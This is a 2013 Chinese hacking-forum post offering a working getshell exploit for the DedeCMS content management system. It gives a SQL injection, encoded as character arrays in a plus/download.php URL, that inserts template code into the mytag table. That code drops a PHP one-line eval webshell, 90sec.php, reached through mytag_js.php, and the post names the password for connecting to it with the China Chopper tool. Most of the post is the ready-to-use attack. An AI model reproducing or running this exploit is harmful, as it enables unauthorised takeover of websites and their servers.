找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2513|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑
% L" c; e/ G, P
( T8 }5 ]1 ^  d. E
3 i4 d* n2 a! b1 l5 n% N" o; f作者:鬼哥
3 I$ N0 e3 u9 A' k' y* Y0 Q$ |" H
看贴不回,没JJ
- o' F/ }% r9 z: b, d  {
( A# ~: G2 {. ^$ C! I9 ~* ^% [漏洞大家都知道是哪个。- R2 e; d3 x( l# i& T0 y

: h) Y$ ~# y3 z' i$ i/ |其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。2 U! S) F4 n: E. Y# N3 l1 X

5 B4 T( d* F3 Q+ H- v但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。: U' a( H+ x* ^; I

' I( A- L! n2 X. N9 Y! i* |刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?0 r+ e3 V- }- U- b& w; i! O
( P5 [; E) F" H6 x, {
getshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。
: @9 n' u1 p# d7 n; t7 h' q2 w& `2 {# t: C! l
但是测试了下。。失败
1 `+ V/ X( a3 c3 u2 h" A
0 g% v! q( @4 X$ h- s! _& o9 O原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。0 ]9 y4 v5 c5 R, w# J" h$ ^3 c
7 E! C! k+ |' P0 M8 U' c
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`% N6 t- n- G, f
5 N; _( i5 h/ q7 l+ x4 F
EXP:) d4 i& E7 v* D8 c
6 s) h: \% O+ |* X  }
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96  y! C4 M  x* |9 E! p* b8 n* N4 \
  O* H1 h! T9 D# z! u3 H3 y2 u
$ v# Y/ R5 x: Q0 c' T4 w* z
成功增加。
8 d$ [* ]5 c7 f0 m/ N2 Q
1 C) k) o3 O: D$ c4 f访问http://www.xxx.com/plus/mytag_js.php?aid=9013+ F! L: ]# I& N" H# H% i
生成一句话木马.
" l. T( A" q2 d5 g' g8 ^菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige* r: C1 t! Q" T# r
& ?, O$ Z) z; k
测试OK。
9 F  e) f+ k! J& A  R3 C3 s
; F3 z! @" \; f4 v 9 m! H7 r3 K* ~7 c: K1 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表